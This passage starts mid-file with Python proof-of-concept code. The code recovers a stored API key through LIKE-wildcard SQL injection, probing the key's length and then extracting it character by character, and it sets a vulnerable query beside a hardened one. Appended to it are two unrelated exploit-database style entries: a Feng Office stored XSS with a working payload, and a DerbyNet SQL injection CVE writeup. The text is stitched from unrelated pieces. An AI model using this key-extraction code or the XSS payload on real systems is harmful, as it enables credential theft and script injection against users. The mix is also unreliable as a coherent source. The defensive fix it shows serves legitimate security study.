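                       (f"%<APIKey>{api_key}</APIKey>%",)).fetchone()
    return row is not None


def escape_like(value: str, esc: str = "\\") -> str:
    """Neutralise LIKE metacharacters so the bound value is matched literally.
    The escape character itself must be doubled first."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def session_exists_hardened(conn: sqlite3.Connection, api_key: str) -> bool:
    """Hardened form: user-supplied wildcards are escaped and the ESCAPE clause
    tells the engine which character does the escaping."""
    row = conn.execute(
        "SELECT XMLContent FROM Planning WHERE XMLContent LIKE ? ESCAPE '\\'",
        (f"%<APIKey>{escape_like(api_key)}</APIKey>%",)).fetchone()
    return row is not None


def probe_key_length(oracle: Oracle, max_len: int = 64) -> Optional[int]:
    """'_' matches exactly one character, so n underscores between the
    <APIKey> tags match iff the stored key has length n."""
    for n in range(1, max_len + 1):
        if oracle("_" * n):
            return n
    return None


def exfiltrate_key(oracle: Oracle, alphabet: str = KEY_ALPHABET,
                   max_len: int = 64) -> Optional[str]:
    """Extend a known prefix one character at a time: prefix + '%' is accepted
    only when some stored key starts with that prefix. Stops when the prefix
    alone, with no wildcard, is accepted, i.e. a complete key is recovered."""
    known = ""
    while len(known) < max_len:
        if known and oracle(known):
            return known
        for c in alphabet:
            if oracle(known + c + "%"):
                known += c
                break
        else:
            return None          # no candidate extends the prefix (wrong alphabet?)
    return None


if __name__ == "__main__":
    conn = make_db(SAMPLE_API_KEY)
    vuln = lambda k: session_exists_vulnerable(conn, k)
    hard = lambda k: session_exists_hardened(conn, k)
    print("bare '%' accepted by vulnerable query:", vuln("%"))
    print("key length via '_' probe:", probe_key_length(vuln))
    print("recovered key:", exfiltrate_key(vuln))
    print("bare '%' accepted by hardened query:", hard("%"))
    print("real key accepted by hardened query:", hard(SAMPLE_API_KEY))
```

Two caveats carry over to the real target. LIKE compares ASCII case-insensitively in SQLite and under MySQL's default collations, so the recovered key comes back in the alphabet's case; because the server applies the same comparison, such a key is accepted regardless. Escaping only closes the wildcard channel: the stronger fix is to stop substring-matching an XML blob and compare the key against a dedicated column with `=`, which also removes the timing and row-count side channels a LIKE scan carries.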
<pre><code># Exploit Title: Feng Office version 3.10.8.21 - Stored XSS<br /># Exploit Author: tmrswrr <br /># Vendor Homepage: https://www.fengoffice.com/<br /># Version: 3.10.8.21 <br /><br />1) Log in as admin at https://127.0.0.1/Feng_Office/index.php?c=access&a=index#<br />2) Click Tasks and add a task containing the payload "><img src=x onerrora=confirm() onerror=confirm(1)><br />3) Click "Add worked hours"; the stored payload executes and the XSS alert appears.<br /><br /></code></pre>
<pre><code>CVE ID: CVE-2024-30923<br /><br />Description:<br />An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, specifically within the `print/render/racer.inc` component. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting improper sanitization of the `where` clause in Racer Document Rendering.<br /><br />Vulnerability Type: SQL Injection<br /><br />Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet<br /><br />Affected Product Code Base: DerbyNet - v9.0<br /><br />Affected Component: print/render/racer.inc<br /><br />Attack Type: Remote<br /><br />Impact:<br />- Code execution: True<br />- Information Disclosure: True<br /><br />Attack Vectors:<br />The vulnerability is present in the `print/render/racer.inc` component of DerbyNet, due to insufficient sanitization of the `where` parameter within the URL. Attackers can manipulate SQL queries by injecting malicious SQL commands through the `where` parameter, as demonstrated in the following URL:<br />- `http://127.0.0.1:8000/render-document.php/award/GoldCupAwardDocument?where=1`<br /><br />This manipulation could lead to unauthorized access to database information and potential code execution on the server hosting the application.<br /><br />Discoverer: Valentin Lobstein<br /><br />References:<br />- Official website: http://derbynet.com<br />- Source code on GitHub: https://github.com/jeffpiazza/derbynet<br /><br /></code></pre>